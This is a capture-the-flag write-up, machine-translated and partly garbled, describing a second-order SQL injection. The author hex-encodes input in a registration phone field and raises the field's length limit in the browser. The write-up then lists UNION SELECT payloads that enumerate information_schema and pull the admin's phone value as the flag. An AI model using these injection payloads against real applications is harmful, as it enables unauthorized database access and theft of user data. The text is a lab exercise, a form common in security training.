Opening the topic is a registered ordinary login screen, just sign up for a two-point function in, a telephone and you are viewing the same user, one is out.
Click on the query you can see the number of users
There should be access to the database operations, so we should be solving injection database.
And by examining the source code found in a prompt query interface
Not much to say First down
And then try to register the phone contains language injection
Tip Please enter a number. . . .
It seems here that we need to enter numbers using hexadecimal numbers (hex codes) instead of the input string to inject language
Use transcoding tool on it
First try database query operation
1 union select schema_table from information_schema.tables where schema=database()
He suggested that I find a phone number for the V , may limit the length of a phone number HEX incoming code
(I found the second registration does not modify this value, then we have to type in the phone number field, enter the registration interface 11 bits can not get more direct input)
In the registration page attempt to modify the source code
Press F12 to find the value of the length in the source code, modify it, I changed to 99999
Then continue to try to register input HEX Code
Then log
Success
Then the next step query, the database name
1 and 1=2 union select database()
Then the table
1 union select table_name from information_schema.tables where table_schema=database()
Longer column
1 union select column_name from information_schema.columns where table_name="user"
He broke a bunch, but also the three most likely
Then contact us before seeing admin big secret exists, Why, certainly flag
Try accessing username is admin information
构造payload:1 and 1=2 union select phone from user where username="admin"
Get flag